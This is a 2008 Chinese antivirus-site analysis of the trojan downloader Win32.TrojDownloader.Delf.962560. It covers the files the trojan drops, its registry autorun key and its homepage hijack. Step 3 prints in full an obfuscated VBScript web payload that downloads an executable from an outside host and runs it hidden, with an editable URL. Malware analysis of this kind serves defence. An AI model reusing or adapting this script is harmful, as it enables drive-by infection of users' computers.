杀毒联盟帮你提供最完美的电脑病毒资讯网站Rss 2.0

今天是:

 杀毒联盟提供病毒资讯致力做中国最专业的网络学院! [设为首页]  [加入收藏]  [联系我们]
| 网站首页 | 病毒预警 | 最新病毒 | 业界新闻 | 系统进程 | 安全防御 | 解决方案 | 你问我答 |
您现在的位置: 杀毒联盟 >> 最新病毒 >> 正文 知识在于积累,成功在于努力。---杀毒联盟
豆豆网马962560 Win32.TrojDownloader.Delf.962560
杀毒联盟 www.shaduu.com 杀毒很难,防毒很简单,shaduu帮您成为防病毒高手为您提供技术信息   

          ★★★   作者:佚名    文章来源:互联网整理    点击数:    更新时间:2008-5-22 7:07:56 添加到百度搜藏 添加到百度搜藏 【字体:

豆豆网马962560 Win32.TrojDownloader.Delf.962560是一个木马下载者程序。该病毒成功运行起来后,就会从指定的地址下载其它病毒并运行。同时,这个病毒带有一个木马生成器,会在用户系统中生成大量能利用网页传播的脚本病毒。

1.程序运行后,下载文件几百个,有txt,jpg,js等各种病毒文件
C:\Documents and Settings\fish\Cookies\fish@32881[2].txt
C:\Documents and Settings\fish\Cookies\fish@p4p.cnaz[1].txt
C:\Documents and Settings\fish\Cookies\fish@site_pv[1].txt
C:\Documents and Settings\fish\Cookies\fish@www.32881[1].txt
C:\Documents and Settings\fish\Cookies\fish@yahoo[2].txt
.
.
.
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\72x72_2[1].gif
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\72x72_7[1].gif
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\7_0_0[1].htm
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\big[1].jpg
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\bor1_bg[1].jpg
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\img200803251448520[1].jpg
.
.
.
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\TIH5F1C8\ystat[1].js

2.添加注册表项,实现开机自启动:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.htm

3.病毒运行后,运行豆豆网马生成器,其中网马地址可改动。生成网马文件内容类似:

on error resume next
dl = "http://hack.32881.com/muma.exe" //其中这个网马的网址可以修改
Set df = document.createElement("ob"&"ject")
df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A-00C04FC29E36"
str="Microsoft"&".XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"&"ea"
str1=a1&a2&a3
str5=str1
set S = df.createobject(str5&"m","")
S.type = 1
str6="G"&"ET"
x.Open str6, dl, False
x.Send
fname1="g0ld"&".com"
set F = df.createobject("Scripti"&"ng.FilesystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Ap"&"plication","")
Q.ShellExecute fname1,"","","ope"&"n",0

4.病毒会修改IE主页内容为http://www.32881.com/,并设为默认首页

免责声明:本网转载内容均注明出处,转载是出于传递更多信息之目的,并不代表我们立场。

  • 上一篇病毒:

  • 下一篇病毒:

    • 赞 助 商
    		 
    频 道 最 新
    · Hacker.com.cn.exe jiejie下载器4096 Win32
    · HBKernel32.sys HBYY.dll SelfDel.bat  HB网
    · Worm.Brontok.a.98816
    · Win32.Troj.VB.286792
    · 大话西游盗号木马73728 Win32.PSWTroj.Maga
    · %a.exe smssb.exe奸商修改器 Win32.troj.pr
    · 破坏TesSafe.sys  地下城盗贼102400 Win32.
    · 6AECFF9B.cfg 6AECFF9B.dll aecff9.sys 大话
    · dp1.fne Exmlrpc.fne Prstgressep11.exe 黑
    · 6AECFF9B.cfg 6AECFF9B.dll aecff9.sys 大话
    · Prstgressep11.exe 黑客远程控制器765465 W
    · 今日预警“灰鸽子变种FB(Backdoor.Win32.G
    · ED.exe Pierce.exe变形虫下载器143360 Win3
    		 
    相关文章
    没有相关病毒
    Copyright © 2007-2008 by www.shaduU.com All Rights Reserved
    版权所有:杀毒联盟 公司地址:重庆市沙坪坝劳动路坪桥29号 邮 编:400030
    网站管理:重庆新鑫科技信息化司 电 话:13752966523 媒体合作、网站建议请联系我们 渝ICP备08002816号